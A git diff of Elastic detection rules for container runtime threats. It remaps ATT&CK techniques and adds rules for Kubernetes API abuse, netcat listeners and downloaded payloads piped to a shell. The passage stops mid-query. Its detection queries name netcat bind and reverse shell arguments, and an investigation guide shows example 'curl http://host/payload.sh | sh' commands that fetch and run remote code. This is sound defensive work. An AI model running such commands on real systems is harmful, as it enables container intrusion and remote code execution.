["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/06" [rule] author = ["Elastic"] @@ -93,16 +93,16 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml index 1f55491b7bd..5e447e2221b 100644 --- a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml +++ b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/06" [rule] author = ["Elastic"] @@ -101,6 +101,11 @@ id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml index 94048cb61ca..6b685a4acac 100644 --- a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml +++ b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -66,7 +66,16 @@ Containers are lightweight, portable units that encapsulate applications and the risk_score = 21 rule_id = "1a289854-5b78-49fe-9440-8a8096b1ab50" severity = "low" -tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Tactic: Reconnaissance", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,11 +121,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1040" -name = "Network Sniffing" -reference = "https://attack.mitre.org/techniques/T1040/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" @@ -126,3 +130,29 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml index 61bf6736889..b571d34b507 100644 --- a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -114,6 +114,11 @@ id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml new file mode 100644 index 00000000000..eca6ed47139 --- /dev/null +++ b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml @@ -0,0 +1,151 @@ +[metadata] +creation_date = "2026/01/21" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/27" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the execution of direct interactive Kubernetes API requests inside a container. An adversary may +need to execute direct interactive Kubernetes API requests to gain access to the Kubernetes API server or other resources +within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the +cluster, and may indicate an attempt to move laterally within the cluster. Note that this rule may not trigger if the +token is expanded within the process argument list, as the length of the "process.args" field may lead to the field being +ignored. +""" +false_positives = [ + """ + There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, + such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine + if they are indicative of malicious activity or part of legitimate container activity. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Direct Interactive Kubernetes API Request Detected via Defend for Containers" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Direct Interactive Kubernetes API Request Detected via Defend for Containers + +The rule flags interactive use of curl, wget, openssl, busybox ssl_client, socat/ncat, or kubectl from inside a container to call the Kubernetes API with a bearer token, often with custom CA or insecure TLS options. An operator enumerates cluster resources and tests access with in-pod credentials, enabling lateral movement or privilege escalation; after landing in a pod, they read the service account token and query the API to list namespaces, pods, or secrets, or issue kubectl get/patch to probe or modify workloads. + +### Possible investigation steps + +- Map the container ID to its pod, namespace, node, image, and owning controller, and confirm whether this workload is expected to make direct Kubernetes API calls or allow interactive access. +- Determine how the interactive session was initiated and by whom by correlating with Kubernetes events and audit logs for exec/attach/ephemeral-container activity and runtime logs for TTY sessions, including the initiating principal and source IP. +- Correlate with API server audit logs to retrieve the exact requests (verbs, resources, namespaces), the authenticated subject (service account or user), and response codes to identify any successful access to sensitive resources like Secrets or workload-modifying actions. +- Inspect the pod for credential use and operator traces by checking recent process activity, shell history, environment variables, and access to service account token or kubeconfig files at expected mount paths. +- Assess scope and potential persistence by listing recent cluster objects created or modified by the same identity across namespaces (Pods, CronJobs, RoleBindings, Secrets) within the timeframe around the alert. + +### False positive analysis + +- An administrator used kubectl interactively within a maintenance container to run get/list/patch commands during routine operations such as inspecting pods or updating labels, which matches expected administrative behavior. +- A developer ran openssl s_client, socat with SSL, or ncat --ssl interactively from within the container to troubleshoot TLS connectivity to a service endpoint, not the Kubernetes API server, causing the rule to fire despite benign intent. + +### Response and remediation + +- Immediately delete the affected pod to terminate interactive access, and apply a temporary NetworkPolicy in its namespace that blocks egress to the default/kubernetes service (API server) while you patch its ServiceAccount to set automountServiceAccountToken: false. +- Use API server audit logs and kubectl to enumerate actions taken by the pod’s ServiceAccount and revert any unauthorized objects it created or modified (Pods, CronJobs, RoleBindings, Secrets), and remove any attached ephemeral containers across the namespace. +- Rotate credentials and restore workloads by deleting any legacy ServiceAccount token Secret, restarting pods to issue new bound tokens, rebuilding the image from a trusted base, and redeploying with read-only rootfs and minimal RBAC verified via kubectl auth can-i. +- Escalate to incident response if audit logs show Secrets access or create/patch/update on workloads, if the ServiceAccount holds cluster-admin, or if the observed commands used curl -k/--insecure, wget --no-check-certificate, or openssl/socat/ncat with SSL to the API server. +- Harden the cluster by enforcing admission controls that deny kubectl exec/attach for non-admins, requiring automountServiceAccountToken: false by default and short-lived bound tokens where needed, restricting NetworkPolicies so only designated controllers can reach the API server, and adopting distroless images that omit curl/wget/openssl/ncat. +""" +risk_score = 21 +rule_id = "26a989d2-010e-4dae-b46b-689d03cc22b3" +severity = "low" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + ( + process.name == "curl" and + process.args in ("-H", "--header") and + process.args like "*Authorization: Bearer *" and + ( + /* CA-specified */ + process.args in ("--cacert", "--capath") or + /* insecure */ + process.args in ("-k", "--insecure") + ) + ) or + ( + process.name == "wget" and + process.args like "--header*" and + process.args like "*Authorization: Bearer *" and + ( + /* CA-specified */ + process.args == "--ca-certificate" or + /* insecure */ + process.args == "--no-check-certificate" + ) + ) or + ( + /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ("wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget") and + process.args like "--header*" and + process.args like "*Authorization: Bearer*" and + process.args == "--no-check-certificate" + ) or + ( + /* ssl_client is busybox-specific, so we need to handle it separately */ + process.name == "busybox" and + process.args == "ssl_client" and + process.args like "*Authorization: Bearer*" + ) or + (process.name == "openssl" and process.args == "s_client" and process.args == "-connect") or + (process.name == "socat" and process.args like~ "*ssl*") or + (process.name == "ncat" and process.args like "--ssl*") or + (process.name == "kubectl" and process.args in ("get", "list", "watch", "create", "patch", "update")) +) and +process.interactive == true and container.id like "*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml index 40bd33e4804..45afe8cf54e 100644 --- a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/06" [rule] author = ["Elastic"] @@ -51,7 +51,15 @@ This detects an interactive session inside a running Linux container creating a risk_score = 47 rule_id = "b799720e-40d0-4dd6-9c9c-4f193a6ed643" severity = "medium" -tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -66,6 +74,11 @@ sequence by container.id, user.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -76,7 +89,15 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml new file mode 100644 index 00000000000..aa6c4f5a487 --- /dev/null +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml @@ -0,0 +1,115 @@ +[metadata] +creation_date = "2026/02/06" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/02/06" + +[rule] +author = ["Elastic"] +description = """ +This rule detects when an interactive process creates a file inside of a system binary location, inside of a running +container. The system binary locations are /etc, /root, /bin, /usr/bin, /usr/local/bin, and /entrypoint. Adversaries +may use these locations to create files that can be used to execute commands on the underlying host, or to evade +detection by security controls. +""" +from = "now-6m" +index = ["logs-cloud_defend.file*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "System Path File Creation and Execution Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating System Path File Creation and Execution Detected via Defend for Containers + +This detects an interactive session in a running Linux container creating new files under system binary paths like /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint, which often signals an attempt to tamper with execution flow or hide tooling. Attackers commonly gain a shell, then use curl/wget (or a busybox variant) from a writable staging area to drop a new executable into /usr/local/bin or overwrite an entrypoint script to ensure their code runs on start. + +### Possible investigation steps + +- Capture the created file’s metadata (owner, permissions, timestamps) and contents/hash, then determine whether it is an executable/script or a modification to startup/auth/config behavior. +- Compare the file and its path against the container image baseline (layer diff) to confirm it was introduced at runtime and identify the interactive command that created it. +- Review the interactive session context (TTY, user, entry method) and surrounding command activity to assess intent and whether secrets or credentials were accessed. +- Pivot to related activity from the same session such as outbound connections, additional downloads to writable staging areas, or subsequent execution of the new file to gauge impact and scope. +- Check for persistence or host-impact setup by inspecting entrypoint/service definitions, PATH hijacks, mounted host paths, and any new cron/systemd/profile changes within the container. + +### False positive analysis + +- A container administrator troubleshooting interactively may use curl/wget (including via busybox wget) to fetch configuration or helper scripts and write them into /etc, /root, or /entrypoint to quickly test startup or runtime behavior changes. +- An interactive maintenance session may execute a script staged in /tmp or /dev/shm that drops a small wrapper binary or symlink into /usr/local/bin or /usr/bin to temporarily add debugging utilities or adjust PATH-resolved command behavior during incident response. + +### Response and remediation + +- Isolate the impacted container by removing it from service and blocking its egress, then preserve the container filesystem (or take a snapshot) so the created artifacts under /etc, /root, /bin, /usr/bin, /usr/local/bin, or /entrypoint can be analyzed. +- Identify and remove the dropped or modified file(s) and any related persistence (e.g., altered /entrypoint script, PATH-hijacking binaries, modified shell profiles), then stop any processes launched from writable staging paths like /tmp, /dev/shm, /var/tmp, /run, /var/run, or /mnt. +- Redeploy the workload from a known-good image and verified configuration (including entrypoint and mounted volumes), rotate any secrets or tokens that could have been accessed in the interactive session, and validate the new pod/container does not recreate files in system binary locations. +- Escalate immediately to the incident response team if the created file is executable, replaces an entrypoint, initiates outbound downloads or connections, or if multiple containers show similar drops in system binary paths suggesting broader compromise. +- Harden by enforcing non-root, read-only root filesystem, and disallowing interactive exec into production containers, then restrict outbound network access and block write access to system binary locations via security policies and runtime controls.""" +risk_score = 47 +rule_id = "05a50000-9886-4695-ad33-3f990dc142e2" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +file where host.os.type == "linux" and event.type == "creation" and process.interactive == true and +file.path like ( + "/etc/*", "/root/*", "/bin/*", "/usr/bin/*", "/usr/local/bin/*", "/entrypoint*" +) and ( + process.name like ("wget", "curl") or + (process.name == "busybox" and process.args == "wget") or + process.executable like ("/tmp/*", "/dev/shm/*", "/var/tmp/*", "/run/*", "/var/run/*", "/mnt/*") +) and container.id like "?*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml index 01fd7364cb3..6b221375e8f 100644 --- a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/01/15" [rule] author = ["Elastic"] @@ -98,11 +98,6 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml index 34f7b454378..4d369ab6944 100644 --- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml +++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -88,9 +88,14 @@ process.interactive == true and container.id like "?*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml new file mode 100644 index 00000000000..8c8ff36688b --- /dev/null +++ b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml @@ -0,0 +1,127 @@ +[metadata] +creation_date = "2023/04/26" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/15" + +[rule] +author = ["Elastic"] +description = """ +This rule detects an established netcat file transfer or listener running inside a container. Netcat is a utility +used for reading and writing data across network connections, and it can be used for malicious purposes such as +establishing a backdoor for persistence, exfiltrating data or file transfer. +""" +false_positives = [ + """ + There is a potential for false positives if the container is used for legitimate tasks that require the use of + netcat, such as network troubleshooting, testing or system monitoring. It is important to investigate any alerts + generated by this rule to determine if they are indicative of malicious activity or part of legitimate container + activity. + """, +] +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Netcat File Transfer or Listener Detected via Defend for Containers" +note = """## Setup + +## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Netcat File Transfer or Listener Detected via Defend for Containers + +Netcat is a versatile networking tool used for reading and writing data across network connections, often employed for legitimate purposes like debugging and network diagnostics. However, adversaries can exploit Netcat to establish unauthorized backdoors or exfiltrate data from containers. The detection rule identifies suspicious Netcat activity by monitoring process events within containers, focusing on specific arguments that indicate a listening state, which is a common trait of malicious use. This proactive detection helps mitigate potential threats by flagging unusual network behavior indicative of compromise. + +### Possible investigation steps + +- Review the container ID associated with the alert to identify the specific container where the Netcat listener was established. This can help in understanding the context and potential impact. +- Examine the process name and arguments to confirm the presence of Netcat and its listening state. Look for arguments like "-l", "--listen", "-p", or "--source-port" to verify the listener setup. +- Check the parent process of the Netcat instance to determine how it was initiated. This can provide insights into whether it was started by a legitimate application or a potentially malicious script. +- Investigate the network connections associated with the container to identify any unusual or unauthorized connections that may indicate data exfiltration or communication with a command and control server. +- Analyze the container's recent activity and logs to identify any other suspicious behavior or anomalies that could be related to the Netcat listener, such as unexpected file modifications or other process executions. +- Assess the container's security posture and configuration to determine if there are any vulnerabilities or misconfigurations that could have been exploited to establish the Netcat listener. + +### False positive analysis + +- Development and testing activities within containers may trigger the rule if Netcat is used for legitimate debugging or network diagnostics. Users can create exceptions for specific container IDs or process names associated with known development environments. +- Automated scripts or tools that utilize Netcat for routine network checks or health monitoring might be flagged. To mitigate this, users can whitelist these scripts by identifying their unique process arguments or execution patterns. +- Containers running network services that rely on Netcat for legitimate communication purposes could be mistakenly identified. Users should document and exclude these services by specifying their container IDs and associated process arguments. +- Security tools or monitoring solutions that incorporate Netcat for legitimate scanning or testing purposes may cause false positives. Users can manage this by excluding these tools based on their known process names and arguments. + +### Response and remediation + +- Immediately isolate the affected container to prevent further unauthorized access or data exfiltration. This can be done by stopping the container or disconnecting it from the network. +- Conduct a thorough review of the container's logs and process history to identify any unauthorized access or data transfers that may have occurred. +- Remove any unauthorized Netcat binaries or scripts found within the container to eliminate the backdoor. +- Rebuild the container from a known good image to ensure no residual malicious artifacts remain. +- Update container images and underlying host systems with the latest security patches to mitigate vulnerabilities that could be exploited by similar threats. +- Implement network segmentation and firewall rules to restrict unauthorized outbound connections from containers, reducing the risk of data exfiltration. +- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other containers or systems within the environment.""" +risk_score = 47 +rule_id = "a52a9439-d52c-401c-be37-2785235c6547" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or + ( + /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "nc", "/bin/nc", "/usr/bin/nc", "/usr/local/bin/nc", + "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", + "netcat", "/bin/netcat", "/usr/bin/netcat", "/usr/local/bin/netcat", + "netcat.openbsd", "/bin/netcat.openbsd", "/usr/bin/netcat.openbsd", "/usr/local/bin/netcat.openbsd", + "netcat.traditional", "/bin/netcat.traditional", "/usr/bin/netcat.traditional", "/usr/local/bin/netcat.traditional" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) +) and +process.args like~ ( + /* bind shell to specific port or listener */ + "-*l*","-*p*", + /* reverse shell to command-line interpreter used for command execution */ + "-*e*", + /* file transfer via stdout/pipe */ + ">","<", "|" +) and process.interactive == true and container.id like "*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml new file mode 100644 index 00000000000..929a3fbb945 --- /dev/null +++ b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml @@ -0,0 +1,136 @@ +[metadata] +creation_date = "2026/02/10" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects when a payload is downloaded and piped to a shell inside a running container. This +could indicate a threat actor downloaded a payload and executed it using a shell without the payload +being stored on the filesystem. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Payload Execution via Shell Pipe Detected by Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Payload Execution via Shell Pipe Detected by Defend for Containers + +This rule detects an interactive session in a running Linux container where a downloader process is immediately followed by a shell execution, consistent with fetching code and executing it without writing a file. This matters because piping remote content directly into a shell enables fast, stealthy execution and can bypass filesystem-based controls and forensics. Attackers commonly run patterns like `curl http://host/payload.sh | sh` or `wget -qO- http://host/bootstrap | bash` during initial foothold or lateral movement inside containers. + +### Possible investigation steps + +- Capture the full interactive command line and session context (TTY/user, working directory, parent chain) to determine whether the shell received stdin from the downloader and what was executed. +- Identify the remote URL/host contacted and pivot on outbound network telemetry (DNS/HTTP/SNI/IP) to confirm download success, reputation, and whether the endpoint has been used by other workloads. +- Enumerate follow-on processes spawned by the shell within the next few minutes (e.g., package installs, compilers, crypto-miners, persistence tooling) to assess impact and scope of execution. +- Check for container breakout or host interaction indicators by reviewing new mounts, access to the Docker/CRI socket, privileged namespace usage, and any writes to host paths from within the container. +- Preserve volatile artifacts by exporting the container filesystem and collecting in-memory/runtime evidence (environment variables, loaded binaries, cron/systemd/user profiles) before the workload is recycled. + +### False positive analysis + +- An administrator or developer may use an interactive exec session to troubleshoot or apply a quick remediation by running `curl`/`wget` piped into `sh` (to avoid saving a temporary file), so validate the interactive user/TTY, parent process chain, and whether the contacted URL/host is an expected internal source. +- During manual container bootstrap or environment setup, an operator may fetch a short initialization or configuration script via `curl`/`wget` and immediately invoke a shell to run it, so confirm it aligns with recent deployment/change activity and that follow-on process, network, and filesystem behavior matches the intended setup. + +### Response and remediation + +- Immediately isolate the affected container/pod by blocking egress and terminating any active `kubectl exec`/interactive sessions that launched `curl`/`wget` and then a shell to stop further command execution. +- Preserve evidence before restart by snapshotting the container image/filesystem and collecting running process trees, open network connections, environment variables, and shell history/output associated with the piped execution. +- Eradicate by deleting and redeploying the workload from a known-good image, rotating any secrets and tokens available to the container, and removing any unauthorized binaries, cron jobs, startup scripts, or modified entrypoints created by the shell session. +- Escalate to incident response immediately if the downloaded content contacted unknown/external infrastructure, spawned post-exploitation tooling (e.g., miners, scanners, reverse shells), or showed signs of host interaction such as access to the container runtime socket or host-mounted paths. +- Harden by restricting interactive exec access (RBAC/MFA/just-in-time), enforcing signed/approved images, applying network policies to limit outbound access, and adding runtime controls to block `curl|sh`/`wget|sh` patterns or require allowlisted internal artifact sources.""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 47 +rule_id = "a750bbcc-863f-41ef-9924-fd8224e23694" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence by process.parent.entity_id, container.id with maxspan=1s + [process where event.type == "start" and event.action == "exec" and process.name in ("curl", "wget")] + [process where event.action in ("exec", 